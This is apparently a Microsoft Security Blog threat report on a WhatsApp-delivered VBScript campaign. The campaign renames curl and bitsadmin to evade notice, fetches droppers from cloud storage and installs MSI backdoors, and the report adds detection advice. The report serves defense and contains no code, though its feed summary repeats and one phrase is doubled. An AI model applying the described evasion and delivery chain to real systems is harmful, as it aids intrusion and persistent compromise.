WhatsApp malware campaign delivers VBScript and MSI backdoors

Microsoft Security Experts identified a sophisticated malware campaign active since late February 2026 that leverages WhatsApp messages to deliver VBScript payloads initiating a multi-stage infection chain. The attack employs social engineering tactics, delivering malicious VBS files that establish persistence through renamed Windows utilities, cloud-hosted payloads on AWS, Tencent Cloud, and Backblaze B2, and UAC bypass techniques. The final stage deploys malicious MSI installers to maintain control over compromised systems. Organizations should monitor for PE metadata discrepancies, unusual VBS execution patterns, and registry modifications under HKLM\Software\Microsoft\Windows. Microsoft Defender can detect these threats by identifying files where names do not match embedded OriginalFileName metadata.

A malware campaign uses WhatsApp messages to deliver VBS scripts that initiate a multi-stage infection chain. The attack leverages renamed Windows tools and cloud-hosted payloads to install MSI backdoors and maintain persistent access to compromised systems. The post WhatsApp malware campaign delivers VBScript and MSI backdoors appeared first on Microsoft Security Blog .

Microsoft Security Experts identified a sophisticated malware campaign active since late February 2026 that leverages WhatsApp messages to deliver VBScript payloads initiating a multi-stage infection chain. The attack employs social engineering tactics, delivering malicious VBS files that establish persistence through renamed Windows utilities, cloud-hosted payloads on AWS, Tencent Cloud, and Backblaze B2, and UAC bypass techniques. The final stage deploys malicious MSI installers to maintain control over compromised systems. Organizations should monitor for PE metadata discrepancies, unusual VBS execution patterns, and registry modifications under HKLM\Software\Microsoft\Windows. Microsoft Defender can detect these threats by identifying files where names do not match embedded OriginalFileName metadata. A malware campaign uses WhatsApp messages to deliver VBS scripts that initiate a multi-stage infection chain. The attack leverages renamed Windows tools and cloud-hosted payloads to install MSI backdoors and maintain persistent access to compromised systems. The post WhatsApp malware campaign delivers VBScript and MSI backdoors appeared first on Microsoft Security Blog . In this article Attack chain overview Mitigation and protection guidance Hunting queries Indicators of compromise Microsoft Defender Experts observed a campaign beginning in late February 2026 that uses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files. Once executed, these scripts initiate a multi-stage infection chain designed to establish persistence and enable remote access. The campaign relies on a combination of social engineering and living-off-the-land techniques. It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system. By combining trusted platforms with legitimate tools, the threat actor reduces visibility and increases the likelihood of successful execution. Attack chain overview This campaign demonstrates a sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting. The attackers aim to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems. Figure 1. Infection chain illustrating the execution flow of a VBS-based malware campaign. Stage 1: Initial Access via WhatsApp The campaign begins with the delivery of malicious Visual Basic Script (VBS) files through WhatsApp messages, exploiting the trust users place in familiar communication platforms. Once executed, these scripts create hidden folders in C:\ProgramData and drop renamed versions of legitimate Windows utilities such as curl.exe renamed as netapi.dll and bitsadmin.exe as sc.exe. By disguising these tools under misleading names, attackers ensure they blend seamlessly into the system environment. Notably, these renamed binaries Notably, these renamed binaries retain their original PE (Portable Executable) metadata, including the OriginalFileName field which still identifies them as curl.exe and bitsadmin.exe. This means Microsoft Defender and other security solutions can leverage this metadata discrepancy as a detection signal, flagging instances where a file’s name does not match its embedded OriginalFileName. However, for environments where PE metadata inspection is not actively monitored, defenders may need to rely on command line flags and network telemetry to hunt for malicious activity. The scripts execute these utilities with downloader flags, initiating the retrieval of additional payloads. Stage 2: Payload Retrieval from Cloud Services After establishing a foothold, the malware advances to its next phase: downloading secondary droppers like auxs.vbs and WinUpdate_KB5034231.vbs. These files are hosted on trusted cloud platforms such as AWS S3, Tencent Cloud, and Backblaze B2, which attackers exploit to mask malicious activity as legitimate traffic. In the screenshot below, the script copies legitimate Windows utilities (curl.exe, bitsadmin.exe) into a hidden folder under C:\ProgramData\EDS8738, renaming them as netapi.dll and sc.exe respectively. Using these renamed binaries with downloader flags, the script retrieves secondary VBS payloads (auxs.vbs, 2009.vbs) from cloud-hosted infrastructure. This technique allows malicious network requests to blend in as routine system activity. Figure 2. Next-stage payload retrieval mechanism. By embedding their operations within widely used cloud services, adversaries make it difficult for defenders to distinguish between normal enterprise activity and malicious downloads. This reliance on cloud infrastructure demonstrates a growing trend in cybercrime, where attackers weaponize trusted technologies to evade detection and complicate...